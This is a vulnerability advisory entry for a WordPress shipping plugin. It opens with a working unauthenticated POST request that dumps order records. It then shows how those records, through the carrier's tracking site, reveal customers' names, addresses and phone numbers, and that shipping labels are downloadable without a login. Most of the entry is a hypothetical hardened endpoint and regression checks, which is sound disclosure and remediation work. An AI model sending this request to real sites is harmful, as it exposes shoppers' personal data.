## https://sploitus.com/exploit?id=WPEX-ID:B14F476E-3124-4CBF-91B4-AE53C4DABD7C
```http
POST /wp-content/plugins/tipsacarrier/js/consulta_datos.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Connection: close
Upgrade-Insecure-Requests: 1

page=1&rows=5000&sidx=id_envio_order&sord=DESC&_search=true
```

The response includes the same data that only an administrator can see on the plugin's page, including:
- The [orderid] number.
- The [creation date] of the order.
- The [shipping agency order code], which can be used at the agency's tracking URL https://dinapaqweb.tipsa-dinapaq.com/dinapaqweb/detalle_envio.php?servicio=[shipping agency order code]&fecha=[creation date in dd/mm/YYYY format] to retrieve the client's full address, full name, phone number, and other data.
- The order shipping status [shipping agency status].
- A URL, [printing tag url], from which the shipping label can be downloaded with no authentication; the file is located under /wp-content/uploads.
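The root cause is a standalone PHP file under the plugin directory that answers any POST without loading WordPress, so no session, capability or nonce check ever runs, and the labels it references sit in the publicly served uploads directory. The following is an added example of how such an endpoint is normally hardened; it is not the plugin's own code. The action names `tipsa_consulta_datos` and `tipsa_download_label`, the helper `tipsa_fetch_shipments()`, the sort column whitelist, the `manage_woocommerce` capability and the `wp-content/tipsa-labels/` storage directory are all assumptions. Everything else (`add_action`, `check_ajax_referer`, `current_user_can`, `wp_send_json_error`, `wp_send_json_success`, `wp_localize_script`, `wp_create_nonce`, `absint`, `sanitize_key`, `sanitize_file_name`, `wp_die`) is the standard WordPress API.

```php
<?php
/**
 * Hypothetical hardened replacement for a directly reachable data endpoint.
 * Not the plugin's own code; see the lead-in for which names are assumed.
 */

// Register the handler for logged-in users only. Deliberately NOT registering
// 'wp_ajax_nopriv_tipsa_consulta_datos' means an anonymous POST gets
// WordPress's default "0" / HTTP 400 reply instead of order data.
add_action( 'wp_ajax_tipsa_consulta_datos', 'tipsa_consulta_datos_handler' );

function tipsa_consulta_datos_handler() {
    // 1. CSRF: the request must carry a nonce minted for this action (dies with 403 otherwise).
    check_ajax_referer( 'tipsa_consulta_datos', 'nonce' );

    // 2. Authorization: only users allowed to manage orders may read shipment data.
    if ( ! current_user_can( 'manage_woocommerce' ) && ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Input validation with hard caps: "rows=5000" can no longer dump the whole table,
    //    and the sort column is restricted to a whitelist instead of reaching the query as-is.
    $page = max( 1, absint( $_POST['page'] ?? 1 ) );
    $rows = min( 100, max( 1, absint( $_POST['rows'] ?? 25 ) ) );
    $allowed_sort = array( 'id_envio_order', 'fecha_creacion' ); // assumed column names
    $sidx = sanitize_key( $_POST['sidx'] ?? 'id_envio_order' );
    if ( ! in_array( $sidx, $allowed_sort, true ) ) {
        $sidx = 'id_envio_order';
    }
    $sord = ( strtoupper( (string) ( $_POST['sord'] ?? 'DESC' ) ) === 'ASC' ) ? 'ASC' : 'DESC';

    // tipsa_fetch_shipments() is an assumed helper that runs a $wpdb->prepare()'d query.
    wp_send_json_success( tipsa_fetch_shipments( $page, $rows, $sidx, $sord ) );
}

// Labels are served through the same gate instead of from /wp-content/uploads.
// They are assumed to be stored in wp-content/tipsa-labels/, a directory the web
// server is configured not to serve directly.
add_action( 'wp_ajax_tipsa_download_label', function () {
    check_ajax_referer( 'tipsa_download_label', 'nonce' );
    if ( ! current_user_can( 'manage_woocommerce' ) && ! current_user_can( 'manage_options' ) ) {
        wp_die( 'forbidden', 403 );
    }
    // basename() strips any directory component, so "../" cannot escape the label directory.
    $file = basename( sanitize_file_name( (string) ( $_GET['label'] ?? '' ) ) );
    $path = WP_CONTENT_DIR . '/tipsa-labels/' . $file;
    if ( '' === $file || ! is_file( $path ) ) {
        wp_die( 'not found', 404 );
    }
    header( 'Content-Type: application/pdf' );
    header( 'Content-Disposition: attachment; filename="' . $file . '"' );
    readfile( $path );
    exit;
} );

// The admin page script receives the admin-ajax URL and a nonce; the grid then posts
// action=tipsa_consulta_datos&nonce=... to admin-ajax.php rather than to a plugin file.
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'tipsa-grid', plugins_url( 'js/grid.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'tipsa-grid', 'tipsaGrid', array(
        'ajaxUrl'   => admin_url( 'admin-ajax.php' ),
        'nonce'     => wp_create_nonce( 'tipsa_consulta_datos' ),
        'labelNonce' => wp_create_nonce( 'tipsa_download_label' ),
    ) );
} );
```

Two design points worth noting for anyone verifying a fix: the authentication boundary moves from "can the file be reached" to "is the caller a logged-in user with the right capability", which is the only boundary WordPress actually enforces, and the label download no longer depends on the file's URL being secret. A quick regression check after patching is that an unauthenticated POST to the old `consulta_datos.php` path returns no shipment data and that a direct request for a label file path under `/wp-content/uploads` no longer resolves.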